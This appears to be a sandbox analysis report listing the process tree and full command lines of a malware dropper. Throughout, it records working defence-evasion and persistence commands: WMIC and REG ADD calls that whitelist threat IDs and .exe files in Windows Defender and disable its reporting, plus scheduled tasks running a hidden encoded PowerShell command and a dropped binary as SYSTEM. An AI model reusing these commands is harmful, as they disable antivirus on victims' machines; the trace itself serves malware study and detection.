PID 1476 wrote to memory of 1528	1476	powershell.exe	WMIC.exe
PID 1476 wrote to memory of 1528	1476	powershell.exe	WMIC.exe
PID 1212 wrote to memory of 4012	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 4012	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 4012	1212	cmd.exe	forfiles.exe
PID 4012 wrote to memory of 2300	4012	forfiles.exe	cmd.exe
PID 4012 wrote to memory of 2300	4012	forfiles.exe	cmd.exe
PID 4012 wrote to memory of 2300	4012	forfiles.exe	cmd.exe
PID 2300 wrote to memory of 2388	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2388	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2388	2300	cmd.exe	powershell.exe
PID 2388 wrote to memory of 1912	2388	powershell.exe	WMIC.exe
PID 2388 wrote to memory of 1912	2388	powershell.exe	WMIC.exe
PID 2388 wrote to memory of 1912	2388	powershell.exe	WMIC.exe
PID 596 wrote to memory of 3940	596	Install.exe	schtasks.exe
PID 596 wrote to memory of 3940	596	Install.exe	schtasks.exe
PID 596 wrote to memory of 3940	596	Install.exe	schtasks.exe
PID 1212 wrote to memory of 3160	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 3160	1212	cmd.exe	forfiles.exe
PID 1212 wrote to memory of 3160	1212	cmd.exe	forfiles.exe
PID 3160 wrote to memory of 2656	3160	forfiles.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe
"C:\Users\Admin\AppData\Local\Temp\fd74c505dfe98f01d8059aee83d68b69ac12216e18eafb75d6badd7e4aee38a7.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Users\Admin\AppData\Local\Temp\7zSD429.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1904

C:\Users\Admin\AppData\Local\Temp\7zSD979.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:3160

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:3204

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1368

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:1724

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3640

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2408

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1028

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:2644

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:840

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:920

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1168

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gTCTbgPXO" /SC once /ST 22:53:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:3940

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gTCTbgPXO"
4⤵
PID:3700

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTCTbgPXO"
4⤵
PID:400

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bUbwOjBFLYdfVuOzuH" /SC once /ST 23:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR\QlXhoPBBTkkyJOx\iTpjBjb.exe\" 0C /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3744

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2100

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2532

C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR\QlXhoPBBTkkyJOx\iTpjBjb.exe
C:\Users\Admin\AppData\Local\Temp\EomvLlobCzofdwkvR\QlXhoPBBTkkyJOx\iTpjBjb.exe 0C /site_id 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2644

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2440

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2308

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1160

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2920

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4060

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2320

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1784

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3660

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1200

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1816

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:3776

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:2212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1312

C:\Windows\SysWOW64\reg.exe
